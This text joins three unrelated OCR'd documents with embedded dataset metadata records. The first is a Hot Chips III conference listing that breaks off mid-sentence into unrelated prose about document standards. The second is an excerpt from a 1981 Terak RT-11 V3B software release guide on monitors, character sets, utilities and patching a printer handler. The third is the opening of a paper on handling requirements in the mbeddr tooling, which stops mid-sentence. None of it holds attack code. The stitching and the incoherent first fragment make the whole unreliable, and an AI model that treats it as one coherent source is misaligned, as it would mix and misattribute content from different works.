HOT Chips III Stanford University, Palo Alto, California HIGH-PERFORMANCE PROCESSORS — Three Sessions MIPS R4000, HP PA-RISC, Intel 80860XP, National Swordfish, INMOS H1, Micron Floating Point RISC, and related topics. HIGHLY PARALLEL CHIPS Philips LIFE VLIWs, Intel & MIT message-driven processors, TRW CPUAX LOW POWER & LOW COST CHIPS Tera SPARC Chipset, LSI Logic SparKit, Intel SMM "Virtual 386" COMMUNICATIONS Vitesse GaAs 64x64 Crosspoint, MIT RN1 Crossbar Router, Echelon NEURON Family, Silicon Graphics Protocol Engine CACHES & FLOATING POINT MIPS R4000 Cache Design, TI Megacell Floating Point Family, Intel i486 2nd Level Cache SPECIAL PROCESSORS C-Cube CL950 MPEG, DEC Smart Frame Buffer, Inova Neural Chip SPECIAL SESSIONS Five Instructions Per Clock: Truth or Consequences Charles F. Goldfarb, IBM Almaden Research Center HvTime is being developed as an open standard plus the large capital and opera- tional commitment. The major costs are in the development and SPDL. Some industries standards
{"Source-Url": "https://www.cse.unsw.edu.au/~cs9243/17s1/papers/nitzberg91:.dsm.pdf", "len_cl100k_base": 7062, "olmocr-version": "0.1.50", "pdf-total-pages": 9, "total-fallback-pages": 0, "total-input-tokens": 10305, "total-output-tokens": 7981, "length": "2e12", "weborganizer": {"__label__adult": 0.0004506111145019531, "__label__art_design": 0.0006270408630371094, "__label__crime_law": 0.00042128562927246094, "__label__education_jobs": 0.0009713172912597656, "__label__entertainment": 0.000125885009765625, "__label__fashion_beauty": 0.00023925304412841797, "__label__finance_business": 0.000362396240234375, "__label__food_dining": 0.0004634857177734375, "__label__games": 0.0008082389831542969, "__label__hardware": 0.012451171875, "__label__health": 0.0008196830749511719, "__label__history": 0.0005340576171875, "__label__home_hobbies": 0.00020503997802734375, "__label__industrial": 0.0010528564453125, "__label__literature": 0.00032067298889160156, "__label__politics": 0.00032401084899902344, "__label__religion": 0.0007996559143066406, "__label__science_tech": 0.376220703125, "__label__social_life": 7.802248001098633e-05, "__label__software": 0.011444091796875, "__label__software_dev": 0.58935546875, "__label__sports_fitness": 0.000438690185546875, "__label__transportation": 0.0011644363403320312, "__label__travel": 0.0002815723419189453}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 35680, 0.02393]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 35680, 0.59154]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 35680, 0.8995]], "google_gemma-3-12b-it_contains_pii": [[0, 2520, false], [2520, 7278, null], [7278, 10372, null], [10372, 14513, null], [14513, 21191, null], [21191, 23289, null], [23289, 26009, null], [26009, 32474, null], [32474, 35680, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2520, true], [2520, 7278, null], [7278, 10372, null], [10372, 14513, null], [14513, 21191, null], [21191, 23289, null], [23289, 26009, null], [26009, 32474, null], [32474, 35680, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 35680, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 35680, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 35680, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 35680, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 35680, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 35680, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 35680, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 35680, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 35680, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 35680, null]], "pdf_page_numbers": [[0, 2520, 1], [2520, 7278, 2], [7278, 10372, 3], [10372, 14513, 4], [14513, 21191, 5], [21191, 23289, 6], [23289, 26009, 7], [26009, 32474, 8], [32474, 35680, 9]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 35680, 0.05699]]}
olmocr_science_pdfs
2024-11-30
2024-11-30
a76730b1a408386d8131fd3d425913c0e975e4d8
TERAK CORPORATION believes that the information contained herein is accurate. In no event will TERAK be liable for any losses or damages whether direct or indirect resulting from the use of such information, including, without limitation, losses arising from claims of patent, copyright, and trademark infringement. No license is granted hereby for the use of any patent or patent rights of TERAK. TERAK reserves the right to update the information contained herein at any time without further notice. The information contained herein is proprietary to TERAK CORPORATION and must be treated as confidential. It may not be disclosed to others or be used for any purpose without the written consent of TERAK CORPORATION. SOFTWARE RELEASE GUIDE TERAK-85/RT-11, VERSION 3B, OPERATING SYSTEM for the TERAK 8510/a BLACK & WHITE GRAPHICS COMPUTER SYSTEM Document No. 60-0079-001 Rev. A Copyright 1981 TERAK CORPORATION "All Rights Reserved" TERAK is a trademark of TERAK CORPORATION. DEC, PDP-11, RT-11 and LSI-11 are trademarks of DIGITAL EQUIPMENT CORPORATION. BASIC is a registered trademark of the Trustees of Dartmouth College. IBM is a trademark of International Business Machine Corporation. Release Date: May, 1981 4. SYSTEM CHARACTERISTICS Before you can begin building a working disk you must determine the system characteristics best suited to your application. This section provides the background information you need to build your working system. Included are discussions of the monitor capabilities, device handlers, and screen console characteristics available with your RT-11 software. In addition, file and monitor naming conventions are reviewed. 4.1 MONITOR CHARACTERISTICS The monitor you choose provides the core around which you will build your working system. There are three primary types of monitor provided with your RT-11 software: the Base-line Single Job Monitor, the Standard Single-Job Monitor and the Foreground/Background Monitor. The Base-line Single Job Monitor is a special version of the single job monitor. It has the smallest memory requirement of the monitors provided and is intended for use in applications where the greatest amount of memory possible must be made available for the user's program. The base-line monitor can perform all of the system commands and run most of the utilities. For highly interactive applications the standard single job monitor should be used. The more complete device support and error processing of the single-job monitor will provide a more flexible and easy to use system. The Single Job Monitor is the smallest standard RT-11 monitor. It will run all the system utilities and support all hardware devices. The single job monitor has the fastest response times, at interrupt and keyboard level, of the standard monitors provided. If your application involves continuous execution of a single user program; interactive program development; or maximum throughput, realtime data aquisition; the single job monitor will be the best choice. The Foreground/Background Monitor is the RT-11 monitor that supports CHOOSING YOUR SYSTEM CHARACTERISTICS multi-programming. The foreground/background monitor lets you operate an independent foreground job, at a higher software priority level than the background, while you use the remaining system facilities to support the background job. The foreground job is not intended for use as a two user time sharing system or for interactive program development. Rather it bests supports a stable, event-driven I/O or realtime job, that can execute with a minimum of user interaction while the background deals with the balance of the system requirements. If you have a real-time, software priority application which you need to run concurrently with normal system development and data-processing applications, the foreground/background monitor is the proper choice. If you do not require concurrent execution, use of the single job monitor will conserve system resources. 4.2 CONSOLE DISPLAY CHARACTERISTICS The console display is provided through a software terminal emulator. Software (the Emulator) controls all console functions, including motions of the cursor, character panning or echo, and scrolling of the screen. The emulator code is resident within the operating system and may be activated by all the standard system terminal procedure calls. The screen may also be driven by user program I/O routines which expect to drive a serial interface at the standard console addresses. The emulators released in this kit are a glass teletype (GT) and the Terak emulator (TK). Other terminals can be emulated but are not provided with this software kit. The emulator accepts characters from the hardware emulator data buffer and places them into the page buffer in a manner similar to a hardware data terminal. The characters are placed into the hardware emulator data buffer by the TT handler which is built into the RT-11 V3B monitors. RT-11, and other code, which drives a serial interface, will operate without modification, provided that the code runs at processor level 0 (all interrupts enabled). Note that MICRO-ODT does not meet this requirement. The GT emulator is used most often when memory space precludes use of the TK emulator or, the simple terminal is all that is required for a particular application. 4.3 DEVICE HANDLERS The Terak RT-11 monitors are generated with the standard DEC RT-11 device handlers, plus system (QX and QB), console (TT), and Null (NL) device handlers. Three (or five) free I/O slots are included for additional devices in the single job and foreground/background monitors. The base-line monitor contains neither a null device handler or free handler slots. The user may add additional device handlers using the INSTALL command as described in RT-11 V3B System User's Guide. CHOOSING YOUR SYSTEM CHARACTERISTICS Summary of Monitor Characteristics <table> <thead> <tr> <th></th> <th>BL</th> <th>SJ</th> <th>FB</th> </tr> </thead> <tbody> <tr> <td>Memory Support Required</td> <td>8-28k-words</td> <td>8-28k-words</td> <td>16-28k-words</td> </tr> <tr> <td>Support FG Job</td> <td>no</td> <td>no</td> <td>yes</td> </tr> <tr> <td>Timer Facilities</td> <td>no</td> <td>yes</td> <td>yes</td> </tr> <tr> <td>BATCH Support</td> <td>no</td> <td>optional</td> <td>optional</td> </tr> <tr> <td>Graphics Terminal Support</td> <td>yes</td> <td>yes</td> <td>yes</td> </tr> <tr> <td>Devices Supported</td> <td>QB,QX,GT</td> <td>QB,QX,GT,NL,TK</td> <td>QB,QX,GT,NL,TK</td> </tr> <tr> <td></td> <td>No free I/O slots</td> <td>3 free I/O slots</td> <td>5 free I/O slots</td> </tr> </tbody> </table> 4.4 TERAK MONITOR CONFIGURATIONS Terak monitors are shipped with either a Terak emulator or a Glass Teletype emulator resident within the monitor. The monitor/emulator combinations shipped are: - Base-line/Glass Teletype - Single-Job/Glass Teletype - Single-Job/Terak - Foreground/background/Glass Teletype - Foreground/background/Terak Each of the monitors also have bootstraps for specific device handlers embedded within the monitor. The device handler specified within the bootstrap may be QX single drive, QX multidrive or QB multidrive. The QB single drive option is resident as a set utility within the QB multidrive monitor. 4.5 MONITOR AND HANDLER FILE EXTENSIONS The RT-11 monitor and handler file extensions follow a standard naming convention. This convention is important to the system at bootstrap time. when the system bootstrap uses a file name search to determine which monitor file to boot and which handler files (and therefore which devices) are present on the system. RT-11 monitor file names are always of the following format: ``` xx MNyS ``` Identifies this file as the system monitor. Identifies the device handler Identifies the monitor type The first two letters (xx) are a two character device code which identifies this monitors system device. The Terak system device will be either QB for the QB series device handler or QX - for the QX series handler. The last two letters (yy), identify the type of monitor resident in the file BL for base-line, SJ for single-job and FB for foreground/background. The middle two letters of any monitor file name are always MN and the file type of the system monitor file is always, .SYS. Therefore, ``` QB5MNSJ.SYS ``` indicates that this file is the system monitor file, that it is a single job monitor and the system device is a QB handler. NOTE that you can identify the monitor code extension, which appears as part of operating system logo, when you boot the system or by checking the disk directory to see which of the monitors present has the .SYS extension. 4.6 MONITOR AND HANDLER NAMING CONVENTIONS When you load a monitor into memory and boot the system, the monitor will return by printing an identifying message on the screen: ``` RT-11 V03B-00D-Axx ``` This indicates that the system is RT-11, the version is 3B, any revisions (00D-A) and the monitor code extension (xxx). The monitor code extension tells you which monitor is currently resident within your operating system. All Terak MONITOR CODE EXTENSIONS follow a standard naming convention. The first letter indicates the type of monitor base-line (B), single-job (SJ) or foreground/background (F). The middle letter identifies the emulator characteristics resident within the monitor; glass teletype (G) or Terak (T). The final letter indicates whether the monitor is intended for use on a single drive (S) or a multidrive system (K). The Terak monitors, their code extensions and characteristics are: ### CHOOSING YOUR SYSTEM CHARACTERISTICS <table> <thead> <tr> <th>Number of terminals</th> <th>M or S</th> </tr> </thead> <tbody> <tr> <td>Type of Job</td> <td>B, S, F</td> </tr> <tr> <td>Emulator</td> <td>G or T</td> </tr> </tbody> </table> #### Monitor Characteristics <table> <thead> <tr> <th>Code Extension</th> <th>Size in blocks</th> <th>Handler</th> <th>User Space (bytes)</th> </tr> </thead> <tbody> <tr> <td>BTM</td> <td>63</td> <td>3</td> <td>25.8</td> </tr> <tr> <td>BGM</td> <td>60</td> <td>3</td> <td>26.3</td> </tr> <tr> <td>STM</td> <td>64</td> <td>3</td> <td>25.5</td> </tr> <tr> <td>SGM</td> <td>62</td> <td>3</td> <td>25.9</td> </tr> <tr> <td>FTM</td> <td>73</td> <td>5</td> <td>23.6</td> </tr> <tr> <td>FGM</td> <td>71</td> <td>5</td> <td>24.1</td> </tr> <tr> <td>BGS</td> <td>64</td> <td>3</td> <td>25.8</td> </tr> <tr> <td>BTS</td> <td>63</td> <td>3</td> <td>26.3</td> </tr> <tr> <td>STS</td> <td>64</td> <td>3</td> <td>25.5</td> </tr> <tr> <td>SGS</td> <td>62</td> <td>3</td> <td>25.9</td> </tr> <tr> <td>FTS</td> <td>73</td> <td>5</td> <td>23.6</td> </tr> <tr> <td>FGS</td> <td>71</td> <td>5</td> <td>24.1</td> </tr> </tbody> </table> ### 4.7 CHARACTER SETS Your RT-11 software contains several character sets. In addition to the standard English character set; foreign language character sets for Greek, Arabic and Russian are available. Several special function sets for science, mathematics and form generation are also included. Character sets have the file extension `.CHR` and must be initialized by the system software. The character set is fetched from a system file, CHRSET.SYS. If the system has been turned off, the system file, CHRSET.SYS, must be present on the disk used to boot the system. You may select any character set by renaming it, CHRSET.SYS. A character set file contains a packed image of either 96 or 192 character templates. Each template is a 10 byte field representing a character of 10 rows of eight pixel, top row first, and left most pixel corresponding to the least significant bit of the byte. The two half character sets are packed arrays of 96 character templates, covering character codes 40 (octal) thru 177, or codes 240 thru 377. In a character set file, the second half character set starts on a logical block boundary. Thus, it is possible to split a character set in half by file surgery using DUP or PIF. Character set files are either two or four blocks long. The default extension for a character set file is `.CHR`. During bootstrap the character set file is loaded into the writeable character generator of the Terak 8510/a. If CHRSET.SYS contains half a character set; the upper half set will be generated from the video reverse of the lower half set. A half character set, 96 characters only, is indicated by a file of only two blocks size. If CHRSET.SYS does not contain half a character set, the entire 192 character set will be load from the contents of the full four block file. If CHRSET.SYS is absent when the system is booted, the bootstrap will proceed. If the power has not been cycled since the last character set load, the previous character set will still be present. If the disk does not have a character set file, no CHRSET.SYS, and the power has been cycled; the system will function normally but random character fonts will be displayed. In this case the utility CSLOAD is available for reloading a character set file. 5.7 THE LIBRARIAN (LIBR) The librarian utility lets you create, update, modify, list, and maintain object library files. You can also create MACRO library files for use with the MACRO assembler. 5.8 THE LINKER (LINK) The Linker converts object modules produced by the language translator to a format suitable for loading and execution. 5.9 THE MACRO-11 PROGRAM ASSEMBLER (MACRO) The MACRO-11 assembler program lets you assemble MACRO programs under the RT-11 operating system, provided those programs have been written using the rules listed in the PDP-11 MACRO-11 Language Reference Manual. 5.10 ON-LINE DEBUGGING TECHNIQUE (ODT) ODT is the RT-11 on-line debugging utility which aids in debugging programs. 5.11 PASCAL/RT-11 FILE CONVERSION UTILITY (PAS2RT) PAS2RT will display the directory of a Pascal structured disk and will transfer files to a RT-11 structured disk. Data may be transferred in either binary or text form. Text files; those that will be accessed by the Editor, or will be used as source code for a compilation or assembly, should be copied in TEXT mode. This is necessary because of the source file format. Other types of files should be transferred in BINARY mode. PAS2RT has a command structure compatible with the corresponding utility RT2PAS which transfers RT-11 structured files to Pascal structure. These two utilities provide transportability between RT-11 and Pascal systems. With the RT-11 system disk in drive 0 and the Pascal disk in drive one, call PAS2RT by typing: ``` R PAS2RT ``` Type: 1. R PAS2RT 2. Y 3. Enter Pascal file to be transferred. 4. Enter RT-11 file name you wish the The system will return: Display Directory? Enter Source file title Enter target file title Transfer mode: B)inary or #T)ext -33- Document No. 60-0079-001 A file to be called (5) Enter B or T PAS2RT will complete the file transfer. 5.12 PATCH The PATCH utility program lets you make code modifications to any RT-11 file. You can use PATCH to interrogate and then to change words or bytes in a file. 5.13 SOURCE COMPARE (SRCCOM) SRCCOM compares two ASCII files and lists the differences between them. SRCCOM can print the results or store them in a file. 5.14 TECO TECO is a text editing program that runs under your RT-11 Operating System. TECO can be used to edit ASCII text including program listings, manuscripts, correspondence or other routine editing jobs. TECO is a character editor rather than a line editor and does not have line numbers associated with it. A single character can be changed without further modifying the line it resides in. Because of its versatility, TECO contains a sophisticated series of commands. The user should review the TECO User's Guide before attempting operation. 5.15 TEXT EDITOR (EDIT) EDIT is a text editor utility used to create or modify ASCII source files for use as input to other system programs. Files may be input to the MACRO-11 assembler or the FORTRAN or BASIC compilers. EDIT can read ASCII files from any input device, modify them, and write to any output device. In addition to the utilities listed in this section, the following special purpose utilities are available: CROSS REFERENCE OPTION DUMP HELP OBJECT MODULE PATCH UTILITY Refer to the RT-11 User's Guide for a complete discussion of their function. <table> <thead> <tr> <th>LOGICAL SENSE</th> <th>O Default = Bit 15 On -&gt; Error</th> </tr> </thead> <tbody> <tr> <td>OF ERROR BIT</td> <td>Set SP Logic</td> </tr> <tr> <td></td> <td>Set SP No Logic</td> </tr> </tbody> </table> - Allows sense of error Bit to be reversed in case the signal is actually clear to send or data set ready in place of error. - Hang option). If no error, hang option has effect. <table> <thead> <tr> <th>SOFTWARE FORM FEED OPTION</th> <th>Default = Hardware, Form Feeds, Set SP SOFTFF, Set SP No SOFTFF</th> </tr> </thead> <tbody> <tr> <td></td> <td>If Soft form feed, the function is simulated by sending line feeds to fill out the page. If no SOFTFF, hardware form feed is assumed. If the handler is freshly loaded, it will assume that the printer is at top of form. To avoid forgetting the actual paper position between print jobs, command KMON to LOAD SP.</td> </tr> <tr> <td>HEIGHT (for Software)</td> <td>Default = 66, Set SP Height = xxx</td> </tr> <tr> <td></td> <td>The height set is used for soft form feeds to calculate the lines remaining on a page.</td> </tr> <tr> <td>FILL CHARACTER</td> <td>Default = Zero Fills, Set SP Fill = xxx</td> </tr> <tr> <td></td> <td>Set SP to send xxx fill characters after every line feed character is sent.</td> </tr> </tbody> </table> To change SP to drive a SLU other than Unit #1, or to change to drive a line printer controller, patch the following locations: <table> <thead> <tr> <th>NAME</th> <th>LOCN</th> <th>OLD VALUE</th> <th>FUNCTION</th> </tr> </thead> <tbody> <tr> <td>SPS</td> <td>1046</td> <td>177524</td> <td>Status Reg Address</td> </tr> <tr> <td>SPB</td> <td>1204</td> <td>177526</td> <td>Data Reg Address</td> </tr> <tr> <td>SPSTRT</td> <td>1000</td> <td>124</td> <td>Transmitter Vector</td> </tr> </tbody> </table> For example, to change to Drive SLU # 7: ``` R PATCH FILENAME --- SP.SYS <return> #1046/177524 176574 <return> #1204/177526 176576 <return> #1000/124 354 <return> #E ```
{"Source-Url": "http://bitsavers.org/pdf/terak/60-0079-001_Rev_A_Software_Release_Guide_Terak-85_RT-11_Version_3B_Operating_System_excerpt_May_1981.pdf", "len_cl100k_base": 4572, "olmocr-version": "0.1.48", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 13716, "total-output-tokens": 4752, "length": "2e12", "weborganizer": {"__label__adult": 0.0005040168762207031, "__label__art_design": 0.0005154609680175781, "__label__crime_law": 0.0005159378051757812, "__label__education_jobs": 0.000492095947265625, "__label__entertainment": 0.00013506412506103516, "__label__fashion_beauty": 0.00020253658294677737, "__label__finance_business": 0.0008106231689453125, "__label__food_dining": 0.00023758411407470703, "__label__games": 0.0015163421630859375, "__label__hardware": 0.08538818359375, "__label__health": 0.0002264976501464844, "__label__history": 0.0001882314682006836, "__label__home_hobbies": 0.000247955322265625, "__label__industrial": 0.0016965866088867188, "__label__literature": 0.0001614093780517578, "__label__politics": 0.00017344951629638672, "__label__religion": 0.0005145072937011719, "__label__science_tech": 0.01549530029296875, "__label__social_life": 5.9723854064941406e-05, "__label__software": 0.43212890625, "__label__software_dev": 0.4580078125, "__label__sports_fitness": 0.0002510547637939453, "__label__transportation": 0.00039577484130859375, "__label__travel": 0.00017309188842773438}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 18182, 0.04121]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 18182, 0.16295]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 18182, 0.87436]], "google_gemma-3-12b-it_contains_pii": [[0, 1225, false], [1225, 1225, null], [1225, 3094, null], [3094, 5849, null], [5849, 7455, null], [7455, 9592, null], [9592, 12427, null], [12427, 12991, null], [12991, 14785, null], [14785, 16306, null], [16306, 16690, null], [16690, 18182, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1225, true], [1225, 1225, null], [1225, 3094, null], [3094, 5849, null], [5849, 7455, null], [7455, 9592, null], [9592, 12427, null], [12427, 12991, null], [12991, 14785, null], [14785, 16306, null], [16306, 16690, null], [16690, 18182, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 18182, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 18182, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 18182, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 18182, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 18182, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 18182, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 18182, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 18182, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 18182, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 18182, null]], "pdf_page_numbers": [[0, 1225, 1], [1225, 1225, 2], [1225, 3094, 3], [3094, 5849, 4], [5849, 7455, 5], [7455, 9592, 6], [9592, 12427, 7], [12427, 12991, 8], [12991, 14785, 9], [14785, 16306, 10], [16306, 16690, 11], [16690, 18182, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 18182, 0.21717]]}
olmocr_science_pdfs
2024-11-25
2024-11-25
bebd78c42a36a0fba24f38e9bdcbef1dcba00361
Requirements as First-Class Citizens: Integrating Requirements closely with Implementation Artifacts Markus Voelter independent/itemis Stuttgart, Germany voelter@acm.org Federico Tomassetti Politecnico di Torino Torino, Italy federico.tomassetti@polito.it Abstract—Requirements often play second fiddle in software development projects. The tools for managing requirements often just support "numbered lists of prose paragraphs", and they don’t integrate well with the tools used for implementing the system. This leads to all kinds of challenges in terms of versioning and traceability. Moreover, because they are mainly prose text, they cannot easily be checked for consistency and completeness, limiting their usefulness. In this paper we describe an alternative approach, where requirements are (at least partially) formalized to support consistency checking, where parts of requirements can be used directly as the implementation, and where requirements are managed with the same tools that are used for system development. The approach is illustrated with the mbeddr system, a comprehensive IDE for embedded software development based on an extensible version of C and domain-specific languages. I. INTRODUCTION Collecting, organizing and managing requirements is mandatory for life-critical systems, essential for mission-critical ones and it can still be very useful in the development of other kinds of systems. Still, it is a cumbersome activity which either is relentlessly executed with major effort (typically if the customer or a certification standard/agency requires it) or it is mainly overlooked, leading to poorly structured and maintained requirements. CURRENT STATE In our opinion, one main problem with the traditional ways to collect and maintain requirements is the inadequacy of the supporting tools (see also the study in [5]; we discuss it in Related Work). In some fields, such as aerospace, automotive or telecoms, requirements are often collected and managed using MS Office documents or tools like DOORS, which basically gather paragraphs of text with no or very limited structure. The relation between requirements and other artifacts (i.e., implementation code, tests, etc.) is collected in other documents, or with comments in the code, requiring manual synchronization with the actual system implementation. It is not surprising that, when possible, practitioners try to escape this situation by either using simpler approaches for requirements elucidation (such as CRC cards1 and user stories) or completely avoiding it. 1http://en.wikipedia.org/wiki/CRC_Cards While agile approaches to requirements engineering limit the burden of managing them, they often do not provide a maintenance strategy for requirements; instead they are considered transient artifacts. This is not acceptable in many domains, where standards require a more structured approach to requirements management. OUR APPROACH The current state of the art can be improved by the seamless integration of requirements engineering concerns into software development tools, developed with language workbenches. This would lead to four main benefits: - reuse of well known tooling: both for editing of requirements and for managing and versioning them. This limits the accidental complexity introduced by requirements engineering. - ease of creating requirement traces: creating links between requirements and artifacts can become much simpler. More importantly, the tool can help to keep traces consistent, - ability to query the requirements model: getting some practical benefits from the requirements not only during the validation phase but also during development. The practitioner (either a developer or a business analyst) will be able to navigate relations between requirements and artifacts and see, for examples, which requirements are related to failing tests or are not connected to implementing artifacts. - extensibility: by using the language modularization and composition features supported by language workbenches, domain-specific extensions to (generic) requirements documents can be seamlessly integrated. In this paper we illustrate an approach that permits the reduction of the cost of maintaining requirements and helps to better leverage them, with immediate benefits to practitioners. Our approach is based on the mbeddr technology stack, which, in turn, is based on JetBrains MPS (discussed below). This tool stack allows us to scale the level of sophistication of the language used to express requirements to the needs of the project. This way, agile projects can use a basic version of the language to express requirements in a very lightweight form. For more demanding contexts, for example the development of complex embedded systems, the tooling permits to plug-in domain-specific extensions of the requirements language, supporting a more sophisticated approach to requirements management. **MBEDDR** mbeddr\(^2\) is an open source project supporting embedded software development based on incremental, modular domain-specific extension of C. It also supports other languages, which is what we exploit in this paper. Figure 1 shows an overview, details are in [3] and [4]. **Figure 1.** The mbeddr technology stack rests on the MPS language workbench. Above it, the first language layer contains an extensible version of the C programming language plus special support for logging/error reporting and build system integration. On top of that, mbeddr comes with a set of default C extensions plus cross-cutting support for requirements, traceability and product line variability. mbeddr builds on the JetBrains MPS language workbench\(^3\), a tool that supports the definition, composition and use of general purpose or domain-specific languages. MPS uses a projectional editor, which means that, although a syntax may look textual, it is not represented as a sequence of characters which are transformed into an abstract syntax tree (AST) by a parser. Instead, a user’s editing actions lead directly to changes in the AST. Projection rules render a concrete syntax from the AST. Consequently, MPS supports non-textual notations such as tables, and it also supports unconstrained language composition and extension – no parser ambiguities can ever result from combining languages. The next layer in mbeddr is an extensible implementation of the C99 programming language in MPS. On top of that, mbeddr ships with a library of reusable extensions relevant to embedded software. As a user writes a program, he can import language extensions from the library them into his program. The main extensions include test cases, interfaces and components, state machines, decision tables and data types with physical units. For many of these extensions, mbeddr provides an integration with static verification tools (model checking state machines, verifying interface contracts or checking decision tables for consistency and completeness; see also [2]). Finally, mbeddr supports two important aspects of the software engineering process: requirements and product line variability. Both are implemented in a generic way that makes them reusable with any mbeddr-based language. We discuss requirements in detail in the remainder of this paper. ### II. Challenges and Solutions In this section we describe a set of current challenges in requirements engineering as well as our approach to solving them in mbeddr. #### A. Requirements Versioned with Code Traditionally, requirements are stored in a tool-specific database. Artifacts are instead typically stored in version control systems (VCS) such as git, SVN or ClearCase. This situation leads to synchronization problems when keeping requirements in sync with the implementation. The natural solution would be to store requirements and implementation artifacts in the same VCS. Since most of today’s VCS work with an update-and-merge strategy (as opposed to pessimistic locking), the requirements tool would need to support diff and merge for requirements as well. In mbeddr, requirements are collected with a special requirements language. Each requirement has an ID, a short description, an optional longer prose, a priority and any number of additional attributes. Requirements can also be nested. Figure 2 shows an example. **Figure 2.** Requirements in mbeddr are arranged as a tree. The colored dots on the left reflect the trace status of a requirement (discussed below). Importantly, since mbeddr is based on MPS, and MPS comes with a generic XML-based storage, all requirements are stored in XML files, along with any other implementation artifacts. MPS also supports diff and merge for any arbitrary language (based on the projected concrete syntax of each particular language), so we get support for diffing and merging requirements for free. mbeddr’s requirements tooling also has an importer to import requirements via XML or CSV files. This way, data migration from traditional requirements management tools is supported. --- \(^2\)http://mbeddr.com \(^3\)http://jetbrains.com/mps B. Traceability into Code When we talk about the integration between code and requirements, we first have to define what we mean by code. In the context of mbeddr, code is any program (or model) expressed with any MPS-based (programming or modeling) language. In particular, C, all extensions of C (default and user-defined) are considered code in the context of this discussion. The simplest kind of integration between code and requirements is tracing: a program element has a pointer to one or more requirements. Such a trace pointer essentially expresses that this particular element is somehow related to a set of requirements. By using different trace kinds, the nature of “somehow related” can be qualified. Trace kinds typically include implements or tests. ![Figure 3](image) Figure 3. A C module with a set of constants that have a trace to a single requirement each. The tracing facility in mbeddr can add traces to any program element expressed in any language. Figure 3 shows a piece of mbeddr program code. The root element is a module, and it has an annotation that specifies to which requirements modules we may want to trace from within that module. We can then add a trace to any program element in that module, tracing to any requirement in the referenced requirements module. There are four important characteristics of this implementation. 1) The requirements trace is not just a comment. It is a well-typed program element that can be used for all kinds of analyses. For example, it is possible to select the requirement, open the Find Usages dialog, and retrieve all program elements that have traces attached to the current requirement. 2) The trace is not an independent program element that is just "geographically close" to the program element it traces. Instead, the trace is a child element of the traced element. This means that, if you move, copy, cut or paste the element, the trace moves with it. 3) Since MPS is a projectional editor, the program can also be shown without the traces, if the user so desires. The traces are still there and can be turned back on again at any time. 4) The tracing facility is completely independent of the traced language. Program elements defined in any (MPS-based) language can be traced. Users can define new languages, and the tracing mechanism will work with the new language automatically. While our tracing framework cannot remove the burden of users to manually establish and maintain the traces according to the actual relationship between the code and the requirements, the approach does solve all technical challenges in providing universally-applicable tracing support. However, the fact that referential integrity is automatically checked and that arbitrary analyses can be built on top of the program/requirement/trace data, can be used to ease the work of the developer: requirements and traces are "real code", and not just second-class meta data. C. From Requirements to a Functional Architecture Many projects start out by collecting requirements in a tool such as DOORS, or in other prose-based “databases” like the one discussed for mbeddr above. However, using prose only, it is very hard to keep things consistent – after all there is no type checker or compiler for prose text. One problem in this context is the definition of (functional) components, their responsibilities and their collaborations with other components, which express the high-level, functional structuring of the to-be-built system. One way to get to such components is to play through collaboration scenarios. From these scenarios we can derive which data a components owns, which other components it collaborates with, and which services one component uses from another component as part of such collaborations. However, if we do this only with pen and paper (cf. CRC cards), it can be tough to keep things consistent (this is the prose-only problem in a different guise). At some point, we have to become (somewhat) more formal. In mbeddr, this is realized as follows. Requirements, as introduced above, have a requirement kind (such as functional, operational or usability). Requirements also have additional data. Since MPS supports arbitrary language extension and composition, it is possible to define additional DSLs that can be plugged into a requirement. To express the functional architecture, we have defined three new requirement kinds: actor (an actor outside the system boundary), component (a functional building block of the to-be-built system) and scenario (an examplary collaboration scenario between actors and components, not unlike sequence diagrams). ![Figure 4](image) Figure 4. A functional component. It owns a piece of data and provides two capabilities. It does not collaborate with any other component. Figure 4 shows an example of a functional component. Note how it lives inside a requirement, even though the original requirements language was not invasively changed. Figure 5 shows a scenario, expressed with a textual language, with all the usual IDE support. In particular, if component A uses a capability ("calls an operation on") a component B, and B is not defined as a collaborator of A, this results in an error in the IDE. A quick fix can then add B as a collaborator for A. Similarly, one can only use capabilities that are actually defined on 